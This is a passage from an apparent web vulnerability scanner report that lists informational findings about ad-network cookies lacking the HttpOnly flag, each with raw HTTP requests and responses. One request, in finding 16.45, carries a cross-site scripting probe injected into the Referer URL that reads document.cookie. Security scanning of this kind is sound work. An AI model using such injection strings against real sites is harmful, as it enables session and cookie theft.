Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 306
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Wed, 01-Sep-2021 11:34:36 GMT;
Content-Type: text/html
Location: http://www.networkadvertising.org/optout/opt_success.gif
Content-Length: 36
Connection: keep-alive

<h1>Error 302 Moved Temporarily</h1>

16.40. http://ad.360yield.com/match  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.360yield.com
Path:   /match

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /match HTTP/1.1
Host: ad.360yield.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: tuuid=0209d042-a511-4132-b0c3-16dbfa35f0c8; path=/; expires=Tue, 03 Sep 2013 04:05:38 GMT; domain=ad.360yield.com
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 0
Date: Sun, 04 Sep 2011 04:05:38 GMT
Connection: close


16.41. http://ad.afy11.net/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad?mode=7&publisher_dsp_id=7&external_user_id=6731d4ad-7dae-4402-b507-a0bc233d79fb HTTP/1.1
Host: ad.afy11.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: a=9giczsQ9m0aIdZiyorEUmA; s=1,2*4e3f3ebf*IGO51JNM5=*X4rmn3Q---qkEHTEYr1RbVpiIg==*,5*4e4f0e5e*5G3-0JwQvs*4hM6CBAdT525FnQM*,6*4e3f403e*prSKpc=5O1*1zX_b8qUspli5SNX8r-KTrBHYNKPsN5-pIQpNLb1HPFJGDuyf2djy7nMOB0=*,7*4e46e3c5*k1skLaBXSZ*MTwBJmdDAvM3DP0I53ZU9KwntwMLKyCuFYUi-_lKyi5_rsvS*; c=AQECAAAAAAB7LmoESeFFTgAAAAAAAAAAAAAAAAAAAAA-4UVOAgACABGaCNXoAAAAZWNe1egAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD1Cw8AAAAAADu1xNToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIPfLgCR4UVOAAAAAAAAAAAAAAAAAAAAAIbhRU4CAAIAee5p1egAAADJQWzV6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAL-FxtToAAAA1yXH1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; p=AQEBAAAAAAB7LmoESeFFTj-hRU4BAAAACQAAAAEAAAABAAAAAAAAAI6Y29ToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATAAAAAAAAABYAAAAAAAAAGwAAAAAAAAAcAAAAAAAAAICGRB3QAACQhIZEHdAAAJCGhkQd0AAAkLqGRB3QAACQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2p7vV6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADu1xNToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; f=AgEBAAAAAACLAZIHTuFFTg==

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: image/gif
Content-Length: 45
Set-Cookie: s=1,2*4e3f3ebf*IGO51JNM5=*X4rmn3Q---qkEHTEYr1RbVpiIg==*,5*4e4f0e5e*5G3-0JwQvs*4hM6CBAdT525FnQM*,6*4e3f403e*prSKpc=5O1*1zX_b8qUspli5SNX8r-KTrBHYNKPsN5-pIQpNLb1HPFJGDuyf2djy7nMOB0=*,7*4e46e3c5*XTlThOIrK4*ykpnV_WHJVNS6yQYOx0XX-fLuecD8shwZ5X6ChhsIh5uQJui*; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

GIF89a.............!.......,...........D..;if

16.42. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/ads.js?&pub=3750564&code=8093097&cch=8092811&l=300x250&tmz=-5&area=1&res=1920&rnd=0.5452898435760289&lmd=1315121336&url=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2Fturkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917&ref=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airports-main-runway-still-shut-131142 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fc=QAkDFs1L1_VV9R_c6UsDYaPBUEhJYdpD5gsI8S9o6pfJxmeG753N3cyfpzvDjP2Ci5OCbJ1Rk2iW9gYGlcBUN3tfVMi68hHF6JKMDotDPXLi3Sy-PEwXW67DoFr3mtCG; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18%7C21; rds=15221%7C15221%7C15221%7C15221%7C15221%7C15221%7C15221%7Cundefined%7C15221%7C15221%7C15221%7C15221%7C15221%7C15221%7Cundefined%7C15221%7Cundefined%7Cundefined%7C15221%7C15221%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15221%7C15221; rv=1; uid=2925993182975414771

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 06 Sep 2011 02:28:18 GMT
Set-Cookie: uid=2925993182975414771; Domain=.turn.com; Expires=Fri, 02-Mar-2012 02:28:18 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pf=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 02:28:17 GMT
Content-Length: 9731


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...

16.43. http://ad.turn.com/server/pixel.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm HTTP/1.1
Host: ad.turn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2925993182975414771; Domain=.turn.com; Expires=Fri, 02-Mar-2012 04:06:29 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 04 Sep 2011 04:06:29 GMT
Connection: close

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&rnd=2976644985371547667&fpid=&nu=n&t=&
...[SNIP]...

16.44. http://ad.yieldmanager.com/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /imp?Z=1x1&s=2377409&_salt=3098932613&B=10&u=http%3A%2F%2Fd3.zedo.com%2Fjsc%2Fd3%2Fff2.html%3Fn%3D933%3Bc%3D56%3Bs%3D1%3Bd%3D15%3Bw%3D1%3Bh%3D1%3Bq%3D767&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ads.bluelithium.com/st?ad_type=iframe&ad_size=1x1&section=2377409
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; bh="b!!!!x!!-O3!!!!#=3G@^!!Os7!!!!#=3G@^!!`4x!!!!$=3Ef#!!jBx!!!!#=2srH!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!$=3H3d!#0Db!!!!#=3*$x!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#N[5!!!!#=3!ea!#Q*T!!!!$=3H3d!#RY.!!!!$=3H3d!#SCj!!!!$=3H3d!#SCk!!!!$=3H3d!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!$=3H3d!#aG>!!!!$=3H3d!#bw^!!!!#=3G@^!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!$=3H3d!#tK$!!!!$=3H3d!#ust!!!!$=3H3d!#usu!!!!$=3H3d!#v-#!!!!#=3*$x!#wW9!!!!$=3H3d!#yM#!!!!$=3H3d!$#WA!!!!$=3H3d!$%,!!!!!$=3H3d!$%SB!!!!$=3H3d!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*Q<!!!!$=3H3d!$*a0!!!!$=3H3d!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$,0h!!!!$=3H3d!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!$=3H3d!$1:.!!!!#=3!ea!$2j$!!!!$=3H3d!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!$=3H3d!$3y-!!!!'=2v<]!$4ou!!!!$=3H3d!$5Nu!!!!$=3H3d!$5oO!!!!$=3H3d!$5qE!!!!$=3H3d!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!$=3H3d!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!$=3H3d!$=p8!!!!$=3H3d!$=s@!!!!#=3H3d!$>#M!!!!$=3H3d!$>#N!!!!$=3H3d"

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:43:10 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0297.rm.sp2
Set-Cookie: BX=8d7n6ot73ufk2&b=4&s=8m&t=219; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: uid=uid=a09e4546-d69f-11e0-a5c5-78e7d162bcd8&_hmacv=1&_salt=3967239050&_keyid=k1&_hmac=33770ebb043b1dc09a14a334f23f3fc9e4af4294; path=/; expires=Tue, 04-Oct-2011 02:43:10 GMT
Cache-Control: no-store
Last-Modified: Sun, 04 Sep 2011 02:43:10 GMT
Pragma: no-cache
Content-Length: 888
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<iframe allowtransparency=\"true\" scrolling=\"no\" marginwidth=\"0\" marginheight=\"0\" frameborder=\"0\" height=\"1\" width=\"1\" src=\"http://ads.bluelithium.com/iframe3?bCIAAMFGJAA
...[SNIP]...

16.45. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?t=2&id=1413320 HTTP/1.1
Host: ad.yieldmanager.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india6a976%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142
Cookie: bh="b!!!#Y!!!?H!!!!$=1j[w!!*l]!!!!#=.lv=!!+^.!!!!#=3Elr!!-?2!!!!-=38n'!!-C,!!!!#=3BC@!!-O3!!!!*=38n'!!.uv!!!!#=3Elr!!/pp!!!!#=3Elr!!1SP!!!!#=38n,!!3O?!!!!#=3BC@!!UHs!!!!#=0>(p!!X41!!!!#=0>(p!!Zwa!!!!-=38n'!!g]C!!!!#=3Elr!!itb!!!!%=1j[w!!nAq!!!!#=3Elr!!pf4!!!!#=3BC@!!v'l!!!!#=3Elr!!vRq!!!!$=1j[w!!vRr!!!!$=1j[w!!vRw!!!!$=1j[w!!vRx!!!!$=1j[w!!vRy!!!!$=1j[w!!va'!!!!#=3Elr!#!,g!!!!$=1j[w!#!y?!!!!#=.lv=!#%v(!!!!#=2w#K!#.dO!!!!$=2Z2#!#.g1!!!!#=.e%I!#.mL!!!!$=0bvK!#/t]!!!!$=09of!#0L2!!!!%=1Cp-!#0fU!!!!#=1j[w!#0fW!!!!#=1j[w!#2Gj!!!!#=3BC@!#2Oe!!!!#=1j[w!#2Of!!!!#=1j[w!#44f!!!!$=1j[w!#44h!!!!$=1j[w!#7(x!!!!'=38n'!#7)a!!!!%=38n'!#?dj!!!!#=/(P2!#?dk!!!!#=/(P2!#C,X!!!!#=3Elr!#M7R!!!!#=09!!!#M7S!!!!#=1>Dd!#MTC!!!!$=1j[w!#MTH!!!!$=1j[w!#MTI!!!!$=1j[w!#MTJ!!!!$=1j[w!#N[7!!!!#=2w#K!#N[8!!!!#=09!!!#Ps:!!!!#=2[IV!#Q*T!!!!$=2Z2#!#Q,i!!!!#=2Z2#!#ROs!!!!#=3Elr!#SCj!!!!$=2Z2#!#SCk!!!!$=2Z2#!#Sw^!!!!#=/(P2!#U5q!!!!#=09!!!#UDP!!!!$=1j[w!#YCf!!!!#=2w#K!#Ym:!!!!#=1,!r!#Ym>!!!!#=1,!r!#Z8E!!!!*=38n'!#Zgs!!!!%=38n'!#ZhT!!!!'=38n'!#[R[!!!!$=1j[w!#aG>!!!!$=2Z2#!#aP0!!!!'=/<(G!#bGa!!!!#=09!!!#bGi!!!!#=09!!!#bw^!!!!*=38n'!#fBj!!!!*=38n'!#fBk!!!!*=38n'!#fBm!!!!*=38n'!#fBn!!!!*=38n'!#fG+!!!!%=38n'!#fvy!!!!'=/<(I!#g<y!!!!%=38n'!#t>.!!!!#=1,!r!#tLr!!!!#=1+1N!#tn2!!!!$=1j[w!#trp!!!!-=38n'!#ust!!!!$=2Z2#!#usu!!!!$=2Z2#!#uw*!!!!$=1j[w!#v,W!!!!#=09!!!#v,Y!!!!#=1>Dd!#v-$!!!!#=09!!!#wW9!!!!$=2Z2#!#x?H!!!!-=38n'!#xUN!!!!$=1j[w!#yM#!!!!$=2Z2#!$#4B!!!!$=38n'!$#9a!!!!#=1D5B!$#?.!!!!#=1D5@!$#WA!!!!$=2Z2#!$$F#!!!!#=/bCH!$%'+!!!!$=/>v>!$%,!!!!!$=2Z2#!$%SB!!!!$=2Z2#!$'/Y!!!!#=09!!!$(!(!!!!-=38n'!$(!P!!!!*=38n'!$)gA!!!!#=09!!!$*a0!!!!$=2Z2#!$,0h!!!!$=2Z2#!$,5d!!!!#=3Elr!$,jw!!!!#=2w#K!$-%:!!!!$=38n'!$0VL!!!!%=38n'!$0VM!!!!%=38n'!$1]+!!!!+=38n'!$1g/!!!!%=1D5F!$2j$!!!!$=2Z2#!$3IO!!!!*=38n'!$3y-!!!!(=2w%w!$4ou!!!!$=2Z2#!$5)A!!!!#=09!!!$5Rt!!!!#=1>Dd!$5Ru!!!!#=2w#K!$8+W!!!!%=38n'!$8>S!!!!%=1D5C!$8Js!!!!#=/(P2!$8Ju!!!!#=/(P2!$:3.!!!!#=2w#K!$<DI!!!!*=38n'!$=Gi!!!!#=0_Lo!$=p7!!!!#=2Z2#!$=p8!!!!#=2Z2#!$=s9!!!!#=3+WO!$>#M!!!!#=2Z2#!$>#N!!!!#=2Z2#!$>_#!!!!#=2Z2#!$?=*!!!!#=3Elr!$?i5!!!!#=3BC@!$?tC!!!!#=38n'"; ih="b!!!!(!->h]!!!!#=/XuQ!0eUs!!!!#=1F/L!34fN!!!!#=/b4V!34fX!!!!#=/b4X!3DVF!!!!#=1F/N"; BX=8d7n6ot73ufk2&b=4&s=8m&t=219; pv1="b!!!!#!$'!L!$5*F!$kY3!3DVF!%JP7!!!!$!?5%!'2po7!?Q8(!'RQt~~~~~~~=1F/N=3CT*!!!(["; uid=uid=1071eb2c-d4cd-11e0-892f-78e7d1f5079e&_hmacv=1&_salt=321185080&_keyid=k1&_hmac=d75501ec81bb906d515b301e794922b4d10045fa

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:36:24 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!#Z!!!?H!!!!$=1j[w!!*l]!!!!#=.lv=!!+^.!!!!#=3Elr!!-?2!!!!-=38n'!!-C,!!!!#=3BC@!!-O3!!!!*=38n'!!.uv!!!!#=3Elr!!/pp!!!!#=3Elr!!1SP!!!!#=38n,!!3O?!!!!#=3BC@!!UHs!!!!#=0>(p!!X41!!!!#=0>(p!!Zwa!!!!-=38n'!!g]C!!!!#=3Elr!!itb!!!!%=1j[w!!nAq!!!!#=3Elr!!pf4!!!!#=3BC@!!v'l!!!!#=3Elr!!vRq!!!!$=1j[w!!vRr!!!!$=1j[w!!vRw!!!!$=1j[w!!vRx!!!!$=1j[w!!vRy!!!!$=1j[w!!va'!!!!#=3Elr!#!,g!!!!$=1j[w!#!y?!!!!#=.lv=!#%v(!!!!#=2w#K!#.dO!!!!$=2Z2#!#.g1!!!!#=.e%I!#.mL!!!!$=0bvK!#/t]!!!!$=09of!#0L2!!!!%=1Cp-!#0fU!!!!#=1j[w!#0fW!!!!#=1j[w!#2Gj!!!!#=3BC@!#2Oe!!!!#=1j[w!#2Of!!!!#=1j[w!#44f!!!!$=1j[w!#44h!!!!$=1j[w!#7(x!!!!'=38n'!#7)a!!!!%=38n'!#?dj!!!!#=/(P2!#?dk!!!!#=/(P2!#C,X!!!!#=3Elr!#M7R!!!!#=09!!!#M7S!!!!#=1>Dd!#MTC!!!!$=1j[w!#MTH!!!!$=1j[w!#MTI!!!!$=1j[w!#MTJ!!!!$=1j[w!#N[7!!!!#=2w#K!#N[8!!!!#=09!!!#Ps:!!!!#=2[IV!#Q*T!!!!$=2Z2#!#Q,i!!!!#=2Z2#!#ROs!!!!#=3Elr!#SCj!!!!$=2Z2#!#SCk!!!!$=2Z2#!#Sw^!!!!#=/(P2!#U5q!!!!#=09!!!#UDP!!!!$=1j[w!#YCf!!!!#=2w#K!#Ym:!!!!#=1,!r!#Ym>!!!!#=1,!r!#Z8E!!!!*=38n'!#Zgs!!!!%=38n'!#ZhT!!!!'=38n'!#[R[!!!!$=1j[w!#aG>!!!!$=2Z2#!#aP0!!!!'=/<(G!#bGa!!!!#=09!!!#bGi!!!!#=09!!!#bw^!!!!*=38n'!#fBj!!!!*=38n'!#fBk!!!!*=38n'!#fBm!!!!*=38n'!#fBn!!!!*=38n'!#fG+!!!!%=38n'!#fvy!!!!'=/<(I!#g<y!!!!%=38n'!#t>.!!!!#=1,!r!#tLr!!!!#=1+1N!#tn2!!!!$=1j[w!#trp!!!!-=38n'!#ust!!!!$=2Z2#!#usu!!!!$=2Z2#!#uw*!!!!$=1j[w!#v,W!!!!#=09!!!#v,Y!!!!#=1>Dd!#v-$!!!!#=09!!!#wW9!!!!$=2Z2#!#x?H!!!!-=38n'!#xUN!!!!$=1j[w!#yM#!!!!$=2Z2#!$#4B!!!!$=38n'!$#9a!!!!#=1D5B!$#?.!!!!#=1D5@!$#WA!!!!$=2Z2#!$$F#!!!!#=/bCH!$%'+!!!!$=/>v>!$%,!!!!!$=2Z2#!$%SB!!!!$=2Z2#!$'/Y!!!!#=09!!!$(!(!!!!-=38n'!$(!P!!!!*=38n'!$)gA!!!!#=09!!!$*a0!!!!$=2Z2#!$,0h!!!!$=2Z2#!$,5d!!!!#=3Elr!$,jw!!!!#=2w#K!$-%:!!!!$=38n'!$0VL!!!!%=38n'!$0VM!!!!%=38n'!$1]+!!!!+=38n'!$1g/!!!!%=1D5F!$2j$!!!!$=2Z2#!$3IO!!!!*=38n'!$3y-!!!!(=2w%w!$4ou!!!!$=2Z2#!$5)A!!!!#=09!!!$5Rt!!!!#=1>Dd!$5Ru!!!!#=2w#K!$8+W!!!!%=38n'!$8>S!!!!%=1D5C!$8Js!!!!#=/(P2!$8Ju!!!!#=/(P2!$:3.!!!!#=2w#K!$<DI!!!!*=38n'!$=Gi!!!!#=0_Lo!$=X=!!!!#=3H<6!$=p7!!!!#=2Z2#!$=p8!!!!#=2Z2#!$=s9!!!!#=3+WO!$>#M!!!!#=2Z2#!$>#N!!!!#=2Z2#!$>_#!!!!#=2Z2#!$?=*!!!!#=3Elr!$?i5!!!!#=3BC@!$?tC!!!!#=38n'"; path=/; expires=Tue, 03-Sep-2013 02:36:24 GMT
Set-Cookie: BX=8d7n6ot73ufk2&b=4&s=8m&t=219; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Sun, 04 Sep 2011 02:36:24 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

16.46. http://admonkey.dapper.net/PixelMonkey  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admonkey.dapper.net
Path:   /PixelMonkey

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PixelMonkey?optout=set&nai=1&nocache=0.8608357 HTTP/1.1
Host: admonkey.dapper.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.64
Date: Sun, 04 Sep 2011 10:59:25 GMT
Connection: keep-alive
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Expires: Sat, 26 Jul 2007 05:00:00 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV"
Set-Cookie: DAPPEROPTOUT2=OPT-OUT; Domain=.admonkey.dapper.net; Expires=Wed, 01-Sep-2021 10:59:25 GMT
Location: /PixelMonkey?optout=validate&nai=1&nocache=0.4264905224920268
Content-Length: 0


16.47. http://ads.amgdgt.com/ads/opt-out  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.amgdgt.com
Path:   /ads/opt-out

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/opt-out?op=set&src=NAI&j=&nocache=0.7682459 HTTP/1.1
Host: ads.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: OO=OptOut; Domain=.amgdgt.com; Expires=Wed, 01-Sep-2021 10:59:25 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://ads.amgdgt.com/ads/opt-out?op=verify_set&src=NAI
Content-Length: 0
Date: Sun, 04 Sep 2011 10:59:25 GMT


16.48. http://ads.bangkokpost.co.th/jserver/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=120X90PIXELS/POSITION=TOP2/METHOD=JSCRIPT/ACC_RANDOM=589305873  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bangkokpost.co.th
Path:   /jserver/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=120X90PIXELS/POSITION=TOP2/METHOD=JSCRIPT/ACC_RANDOM=589305873

Issue detail

